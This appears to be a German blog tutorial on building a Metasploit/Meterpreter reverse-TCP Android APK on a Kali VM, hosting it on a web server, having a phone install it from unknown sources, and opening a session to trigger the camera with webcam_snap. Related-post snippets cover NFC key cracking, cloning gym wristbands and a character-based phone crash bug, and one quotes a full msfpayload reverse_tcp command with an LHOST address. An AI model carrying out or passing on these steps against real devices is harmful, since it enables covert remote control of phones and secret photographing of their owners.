Metasploit/Meterpreter Android APK

Erster Schritt: Eine Kali Linux VM erstellen

Anleitung ist hier

Zweiter Schritt: Kali konfigurieren

Metasploit/Meterpreter Android APK

Auf das Netzwerkicon oben rechts klicken und IPv4 konfigurieren

Virtualbox -> VM ändern -> Netzwerk auf Netzwerkbrücke stellen, damit die VM auch ans Heimnetz angeschlossen ist

Metasploit/Meterpreter Android APK

Testen ob die IP auch korrekt vergeben wurde und die Verbindung klappt

Metasploit/Meterpreter Android APK

Links in der Leiste metasploit framework starten

Metasploit/Meterpreter Android APK

Die apk Datei für das Android Smartphone erstellen. Danach Webserver starten und die APK Datei in das Webserververzeichnis kopieren.

Die IP Adresse ist die von der Kali VM. Port kann man so lassen.

Metasploit/Meterpreter Android APK

Die Verbindung von der Kali VM zu dem Android Smartphone initialisieren. (TCP Handler aktivieren)

IP von der Kali VM und Port von vorherigem Bild.

Metasploit/Meterpreter Android APK

Die apk Datei vom Webserver der Kali VM laden

Metasploit/Meterpreter Android APK

Die apk Datei installieren

Metasploit/Meterpreter Android APK

Apps von unbekannter Herkunft erlauben und dann die Datei öffnen

Metasploit/Meterpreter Android APK

Handy hat sich erfolgreich zu der Kali VM verbunden.

Metasploit/Meterpreter Android APK

In die gestartete meterpreter session wechseln.

Metasploit/Meterpreter Android APK

Mit webcam_snap Fotos auslösen

Find out the Keys of a NFC Chip with miLazyCracker, Dump the Card with the
Send the Telugu Character "జ్ఞ‌ా" :D And the phone crashes The bug itself involves sending
Link to part two Ziel: Duplizieren von Fitnessstudioarmbändern (Mifare Classic 1K) Erste Ansätze Um die
1. Virtualbox herunterladen https://www.virtualbox.org/wiki/Downloads (Windows hosts oben unter platform packages) 2. Kali Linux herunterladen https://www.kali.org/downloads/
Android Zugriff durch Metasploit/Meterpreter: Backbox/Kali/Backtrack auf einer VM installieren (Netzwerk einrichten) msfpayload -p android/meterpreter/reverse_tcp LHOST=192.168.2.136

Hinterlasse einen Kommentar

  Abonnieren  
Benachrichtige mich bei
Scroll to Top